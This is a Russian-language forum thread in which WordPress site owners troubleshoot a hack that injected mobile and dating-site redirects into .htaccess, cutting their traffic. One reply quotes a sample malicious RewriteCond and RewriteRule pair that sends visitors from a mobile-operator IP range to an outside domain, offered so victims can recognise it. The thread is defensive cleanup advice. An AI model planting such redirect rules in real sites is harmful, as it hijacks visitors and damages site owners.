Ломанули. Просела посещаемость.

Скорее всего вас взломали, так же как и меня. Видимо установили мобильный редирект или еще какую-то подобную гадость. Смотрите файл .htaccess. Проблему я решил восстановлением бекапа до взломанного варианта сайта. Обычная смена паролей не поможет, скорее всего вирус уже в базе данных.

А как определить в этом файле - что есть гадость, что должно быть? Ссылка на что-то или как? Спасибо.

Прочитал вашу ветку, да занятно. У меня кстати тоже стоит этот плагин правда скачал я его на wordpress.com

А что вообще можно было сделать что бы так просела посещаемость? Причем на двух поисковиках одновременно.

За мобильный редирект как яндекс так и гугл наказывают одинаково.

Ну посмотрите есть ли там подозрительный код, например такой:

RewriteCond %{REMOTE_ADDR} ^213\.87\.(128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143)\. [OR]

RewriteRule .* http://warp-master.ru/opera/load/ [L,R]

какие плагины ставили последними?

Связался с Яндексом, cказали что ни каких санкций с их стороны не было. Ну и в webmaster'е яндекса тоже замечаний не было.

В пятницу вечером отвалилась часть интерфейса, не знаю связано ли это было с действиями тех кто получил доступ к сайту, но в итоге отказалось что часть БД не работала, я ее восстановил и сайт заработал.

В htaccess нашел не мои редиректы - почистил. Обновил движок, т.е. заменил все исполняемые файлы. И все выходные все было хорошо. Даже посещаемость начала возвращаться.

Сегодня, по метрике увидел катастрофический провал в посещаемости. Зашел на сайт - и ридерактнулся на сайт знакомств!

Опять проверил htaccess нашел и удалил редиректы. И сменил пароли к ftp и sql.

Не понимаю как они получают доступ к сайту?

Как вообще определить метод взлома моего сайта.

Что вероятней.

Не давно был заражен домашний комп, все почистил, но может тогда своровали сохраненные пароли от ftp.

Или же какой то плагин. Хотя, по последнему на сайте за последний год ни чего не изменилось, все плагины изначально ставились с wordpress.org от туда же скачивался и обновлялся движок. Сейчас все версии актуальны. ни с каких помоек ни когда ни чего не скачивал.

Если это wordpress - уязвимостей которые позволяют такое делать можно по пальцам пересчитать и за последние несколько месяцев новых не было.

Зараженный компьютер - одна из самых частых причин взлома сайтов через ftp.

Если взломают еще раз смотрите логи доступа которые дает хостер - заходили ли в админку, заходили ли через фтп и т.д.

Теперь будет бессмысленно менять пароли. Вирус уже сидит в базе данных.

Самый верный вариант полный бэкап сайта

А логи посмотреть куда шелл залили??

Сто пудов плагины

логи запросил..

нашел в папке плагинов папку, не могу понять к чему она относится, код такой:

add_filter('wp_list_categories', 'e_ListCagegories');

add_filter('the_category', 'e_ListCagegories');

add_filter('single_cat_title', 'e_ListCagegories');



function e_ListCagegories($output)

{

$output = preg_replace('#-\d+-\s+([^"<]+)#si', '\\1', $output);

return $output;

}

К сожалению, не выйдет.

Только в момент взлома сайта узнал что с августа бекап баз данных по чему то не делался.

Так что работать надо с тем что есть.